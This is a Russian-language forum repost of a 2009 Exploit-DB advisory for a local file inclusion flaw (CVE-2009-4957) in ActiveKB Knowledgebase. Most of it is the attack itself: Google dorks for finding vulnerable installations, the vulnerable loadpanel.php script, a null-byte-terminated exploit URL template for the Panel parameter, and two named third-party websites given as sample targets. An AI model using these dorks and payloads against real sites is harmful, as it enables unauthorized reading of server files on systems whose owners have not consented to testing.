Exploit ActiveKB KnowledgeBase - 'Panel' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8346
Проверка EDB
  1. Пройдено
Автор
ANGELA CHANG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-4957
Дата публикации
2009-04-03
Код:
[o]------------------------------------------------------------------------------------[x]
 |  Local File Inclusion Vulnerability                                                  |
[o]------------------------------------------------------------------------------------[o]
 |  Software : ActiveKB Knowledgebase version X.X                                       |
 |  Vendor    : http://www.interspire.com/activekb/                                     |
 |  Date         : 02 April 2009                                                        |
 |  Author     : Angela Chang                                                           |
 |  Contact   :  [email protected]                                                   |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    "Powered by ActiveKB Knowledgebase Software"
    inurl:loadpanel.php?Panel=

[»] Vulnerable

    ./loadpanel.php

[»] Exploit

    http://[site]/[path]/loadpanel.php?Panel=[LFI]%00

[»] Sample

    http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]%00
    http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz     :    Speciale Thanks FoR :                                               |
[o]------------------------------------------------------------------------------------[o]
 |    -------- Vrs-hCk , Nyubi (Solpot) , OoN_Boy      ----------                       |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2009-04-03]
 
Источник
www.exploit-db.com

Похожие темы